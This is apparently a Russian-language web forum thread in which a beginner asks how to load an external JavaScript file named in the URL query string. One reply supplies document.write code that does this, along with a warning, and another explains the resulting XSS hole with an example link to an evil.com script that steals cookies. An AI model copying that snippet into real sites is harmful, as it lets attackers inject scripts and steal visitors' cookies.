Загрузка внешнего скрипта...
 

Раньше нужно было загружать только один внешний скрипт... и все было гуд...

<script TYPE="text/javascript" LANGUAGE="JavaScript" src="1000.js"></script>

теперь появилась необходимость загружать больше, первое, что пришло в голову - взять данные из url'а

www.name.ru/index.htm?1001

<script language="JavaScript">
url=location.search.substring(location.search.lastIndexOf("?")+1,location.search.length);
</script>

1001 - номер нужного скрипта получили, а вот как сделать, что бы загрузился внешний скрипт с таким и менем?

помогите новичку... хелп...

ты создал уязвимость своими руками: это потенциальный xss с огромной функцилнальностью...

а в чем тут уязвимость?

Возможность передать в адресной строке, какой скрипт подключить.

По теме: задача-то какая?

раньше была ссылка на документ... в документе прописывался внешний скрипт.
Он был один, теперь нужно загружать несколько, вот решил через url это сделать.
добавил в ссылку знак вопроса и номер нужного скрипта.
На странице номер нужного скрипта после вопросика получил, а вот как его в строку вставить незнаю.

<script TYPE="text/javascript" LANGUAGE="JavaScript" src="1000.js"></script>

чтобы вместо 1000.js загружался скрипт имя которого будет стоять в url'е после вопросика...

<script language="JavaScript">
var url=location.search.substring(1,location.search.length);
document.write('<script TYPE="text/javascript" src="'+url+'.js"><\/script>')
</script>

но не надо так делать!!!

а как можно по другому это сделать?
и в чем опасность?
насколько я знаю xss это с кукисами связано...

xss - межсайтовый скриптинг.
Почему плохо:
www.name.ru/index.htm?http://www.evil.com/script
И всё... По этой ссылке на твою страничку вставится скрипт http://www.evil.com/script.js и сделает что угодно (сворует куки, покажет порнорекламу и т.д.)

Что значит Несколько скриптов одновременно нужно загрузить, по отдельности или еще как?

нет какойто один, просто нехочу делать кучу одинаковых страниц, а так будет одна но скрипт откроет тот номер которого будет в урле.